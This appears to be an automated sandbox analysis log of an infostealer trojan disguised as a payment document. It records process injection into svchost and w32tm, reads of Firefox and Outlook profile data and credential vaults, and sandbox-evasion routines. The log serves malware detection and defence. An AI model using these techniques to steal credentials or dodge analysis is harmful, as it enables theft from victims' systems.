Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DE3A4B	3_2_00DE3A4B
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363E384	3_2_0363E384
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363E268	3_2_0363E268
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363E721	3_2_0363E721
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363D7E8	3_2_0363D7E8

Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 03967E54 appears 99 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 0399F290 appears 103 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 03955130 appears 58 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 0398EA12 appears 86 times
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: String function: 0390B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03675130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0362B970 appears 250 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03687E54 appears 93 times
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: String function: 008FF9F2 appears 31 times
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: String function: 00900A30 appears 46 times

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004373000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1702942544.00000000046AD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/11

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_009537B5 GetLastError,FormatMessageW,

0_2_009537B5

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_009410BF AdjustTokenPrivileges,CloseHandle,		0_2_009410BF
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_009416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009416C3

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_009551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009551CD

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0096A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0096A67C

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0095648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0095648E

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_008E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_008E42A2

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

File created: C:\Users\user\AppData\Local\Temp\Sheitan

Jump to behavior

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: w32tm.exe, 00000003.00000003.2134765940.0000000003382000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4152385313.0000000003382000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	ReversingLabs: Detection: 76%
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Virustotal: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Process created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"
Source: C:\Windows\SysWOW64\w32tm.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Process created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\SysWOW64\w32tm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\w32tm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Static file information: File size 1619968 > 1048576

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: w32tm.pdb source: svchost.exe, 00000001.00000003.1850120491.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849315584.000000000301B000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152651479.0000000001548000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vtTdsKSTqQr.exe, 00000002.00000002.4152048473.000000000083E000.00000002.00000001.01000000.00000004.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963095315.000000000083E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704263244.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785222613.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1783458890.0000000003200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1894878199.0000000003737000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1892506517.0000000003586000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.0000000003A7E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.00000000038E0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704571921.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000003.1704263244.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1785222613.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1892565492.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1783458890.0000000003200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 00000003.00000003.1894878199.0000000003737000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000003.1892506517.0000000003586000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.0000000003A7E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153282108.00000000038E0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.000000004025C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: w32tm.exe, 00000003.00000002.4152385313.0000000003304000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.000000004025C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: w32tm.pdbGCTL source: svchost.exe, 00000001.00000003.1850120491.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1849315584.000000000301B000.00000004.00000020.00020000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152651479.0000000001548000.00000004.00000020.00020000.00000000.sdmp

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008E42DE

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00900A76 push ecx; ret	0_2_00900A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401911 push esp; ret	1_2_0040191D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401922 push esp; ret	1_2_00401927
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403320 push eax; ret	1_2_00403322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411CCB push es; retf	1_2_00411CD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411E14 push cs; retf	1_2_00411E1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004176E6 push esp; retf	1_2_004176EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx	1_2_036309B6
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E89B30 push esp; retf	2_2_03E89B39
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E8425E push cs; retf	2_2_03E84266
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E84115 push es; retf	2_2_03E84122
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039109AD push ecx; mov dword ptr [esp], ecx	3_2_039109B6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DE43C3 push esp; retf	3_2_00DE43CC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DEC858 pushfd ; ret	3_2_00DEC85A
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DDE9A8 push es; retf	3_2_00DDE9B5
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DDEAF1 push cs; retf	3_2_00DDEAF9
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363D30B push edi; retf	3_2_0363D310
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363B3E9 push FAEDBBA1h; ret	3_2_0363B3F1
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03645142 push eax; ret	3_2_03645144
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363C1D1 push ebx; retf	3_2_0363C1D2
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363D639 push esp; retf	3_2_0363D645
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363A6DA push eax; iretd	3_2_0363A6DF
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03634B94 push edx; retf	3_2_03634BB5
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0363A93A push esi; iretd	3_2_0363A93F
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03635E6E push edi; ret	3_2_03635E6F

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	File created: \payment notification confirmation documents 09_01_2025 paper bill.exe
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	File created: \payment notification confirmation documents 09_01_2025 paper bill.exe			Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_008FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_008FF98E
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00971C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00971C41

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-97852

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	API/Special instruction interceptor: Address: 41C04A4
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_036AD1C0 rdtsc

1_2_036AD1C0

Source: C:\Windows\SysWOW64\w32tm.exe

Window / User API: threadDelayed 9773

Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	API coverage: 3.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\w32tm.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\w32tm.exe TID: 7876	Thread sleep count: 199 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe TID: 7876	Thread sleep time: -398000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe TID: 7876	Thread sleep count: 9773 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe TID: 7876	Thread sleep time: -19546000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe TID: 7888	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe TID: 7888	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe TID: 7888	Thread sleep time: -46500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\w32tm.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\w32tm.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_009568EE FindFirstFileW,FindClose,	0_2_009568EE
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0095698F
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0094D076
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0094D3A9
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00959642
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0095979D
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0094DBBE
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00959B2B
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00955C97
